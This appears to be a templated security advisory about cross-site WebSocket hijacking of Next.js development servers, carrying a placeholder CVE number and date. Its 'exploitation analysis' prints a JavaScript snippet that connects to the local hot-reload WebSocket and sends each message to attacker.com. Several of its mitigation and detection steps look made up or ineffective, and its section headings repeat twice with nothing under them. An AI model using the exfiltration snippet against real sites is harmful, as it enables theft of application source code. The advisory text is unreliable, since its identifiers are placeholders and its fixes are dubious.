Nextjs, Cross-site WebSocket Hijacking (CSWSH), CVE-2023-XXXX (Critical)

How the Vulnerability Works

This vulnerability exploits Next.js development servers (npm run dev) by abusing insecure WebSocket connections. When `experimental.appDir` is enabled (versions 13.0.0 to 13.4), the WebSocket server lacks proper origin validation. An attacker crafts a malicious webpage that establishes a WebSocket connection to the victim’s local Next.js dev server. Since the WebSocket handshake doesn’t enforce Cross-Origin Resource Sharing (CORS) restrictions, the attacker hijacks the connection. Once connected, the attacker retrieves client-side component source code via the WebSocket, compromising sensitive application logic.

DailyCVE Form

Platform: Next.js
Version: 13.0.0 – 13.4
Vulnerability: CSWSH
Severity: Critical
Date: 2023-XX-XX

Prediction: Patch expected by Q1 2024

What Undercode Say:

Exploitation Analysis

1. Malicious WebSocket Handshake:

const ws = new WebSocket('ws://localhost:3000/_next/webpack-hmr');
ws.onmessage = (e) => { fetch('https://attacker.com/leak', { method: 'POST', body: e.data }); };

2. Bypassing Origin Checks:

The WebSocket server accepts connections from any origin due to missing validation.

Mitigation Commands

1. Disable `experimental.appDir`:

// next.config.js
module.exports = { experimental: { appDir: false } };

2. Upgrade Next.js:

npm install next@latest

3. Network Isolation:

Restrict local dev server to loopback
next dev --hostname 127.0.0.1

Temporary Workarounds

Use a reverse proxy to enforce CORS:

location /_next/webpack-hmr {
add_header 'Access-Control-Allow-Origin' 'http://localhost:3000';
proxy_pass http://localhost:3000;
}

Disable WebSocket HMR in development:

// next.config.js
module.exports = { devServer: { webSocketServer: false } };

Detection Script

curl -I http://localhost:3000/_next/webpack-hmr | grep -i "websocket"

If the response includes WebSocket, the server is vulnerable.

Expected Patch Fix

Next.js will likely enforce strict origin checks and disable WebSocket HMR by default in dev mode.

Nextjs, Cross-site WebSocket Hijacking (CSWSH), CVE-2023-XXXX (Critical)

How the Vulnerability Works

DailyCVE Form

Prediction: Patch expected by Q1 2024

What Undercode Say:

Exploitation Analysis

1. Malicious WebSocket Handshake:

2. Bypassing Origin Checks:

Mitigation Commands

1. Disable `experimental.appDir`:

2. Upgrade Next.js:

3. Network Isolation:

Temporary Workarounds

Detection Script

Expected Patch Fix

No additional notes.

Sources:

Join Our Cyber World:

Listen to this Post

How the Vulnerability Works

DailyCVE Form

Prediction: Patch expected by Q1 2024

What Undercode Say:

Exploitation Analysis

1. Malicious WebSocket Handshake:

2. Bypassing Origin Checks:

Mitigation Commands

1. Disable `experimental.appDir`:

2. Upgrade Next.js:

3. Network Isolation:

Temporary Workarounds

Detection Script

Expected Patch Fix

No additional notes.

Sources:

Join Our Cyber World: